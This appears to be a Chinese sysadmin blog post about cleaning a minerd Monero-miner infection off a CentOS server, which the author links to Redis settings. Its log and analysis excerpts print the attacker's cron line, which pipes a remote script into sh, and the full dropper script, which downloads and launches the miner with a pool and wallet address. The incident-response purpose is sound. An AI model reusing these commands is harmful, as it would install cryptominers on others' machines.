彻底清除Linux centos minerd木马 实战 跟redis的设置有关
top -c把cpu占用最多的进程找出来:
Tasks: 136 total, 2 running, 133 sleeping, 0 stopped, 1 zombie Cpu(s): 72.2%us, 5.9%sy, 0.0%ni, 17.5%id, 0.0%wa, 0.0%hi, 0.1%si, 4.3%st Mem: 16330820k total, 4093308k used, 12237512k free, 339564k buffers Swap: 0k total, 0k used, 0k free, 1121232k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 11159 root 20 0 381m 9664 1068 S 299.5 0.1 12416:17 ./minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-poo
定位程序的位置:
# locate minerd
/home/minerd
# chmod -x minerd
查看一下计划任务的时志:
sh-4.1# tail -f /var/log/cron Jan 8 16:01:01 xxxx run-parts(/etc/cron.hourly)[13303]: finished 0anacron Jan 8 16:05:01 xxxx CROND[13307]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh) Jan 8 16:10:01 xxxx CROND[13332]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh) Jan 8 16:10:01 xxxx CROND[13333]: (root) CMD (/usr/lib64/sa/sa1 1 1) Jan 8 16:15:01 xxxx CROND[13380]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh) Jan 8 16:20:01 xxxx CROND[13407]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh) Jan 8 16:20:01 xxxx CROND[13408]: (root) CMD (/usr/lib64/sa/sa1 1 1) Jan 8 16:25:01 xxxx CROND[13432]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh) Jan 8 16:30:01 xxxx CROND[13470]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh) Jan 8 16:30:01 xxxx CROND[13471]: (root) CMD (/usr/lib64/sa/sa1 1 1)
sh-4.1# crontab -l REDIS0007� redis-ver3.2.5 ��crackit@G�ctime��qXused-mem� */5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh
把脚本wget下来看一下内容:
#!/bin/bash Jin=`ps -ef|grep minerd|grep -v grep|wc -l` Pid=`ps -ef|grep minerd|grep -v grep|awk '{print $2}'` Wk=`ps -ef|grep 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN|grep -v grep|wc -l` if [ $Jin -eq 1 ];then if [ $Wk -eq 0 ];then kill -9 $Pid nohup /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x & fi else kill -9 $Pid nohup /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x & fi if [ $Jin -eq 0 ];then mkdir /home -p \ && cd /home \ && curl -L http://sx.doiton.tk/minerd -o minerd\ && chmod +x minerd \ && nohup ./minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x & fi
杀掉minerd
sh-4.1# pkill minerd
清空计划任务:
# crontab -r sh-4.1# crontab -l no crontab for root
查看/root/.ssh发现有导常:
sh-4.1# file root root: data sh-4.1# cat root REDIS0007� redis-ver3.2.5 ��crackit@z�ctime® */5 * * * * /usr/bin/curl -fsSL http://d.nrfly.com/v/down.php?u=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3 | sh ��wx��]sh-4.1# pwd /root/.ssh
下载下来该文件,查看内容:
[root@NB movies]# file down.php\?u\=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3 down.php?u=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3: HTML document text # 发现是html代码
把这个文件清除掉
sh-4.1# rm root
联系方式QQ:326528263 EMAIL:clnking@163.com 网名:bass 分享技术 突破难点 创新思维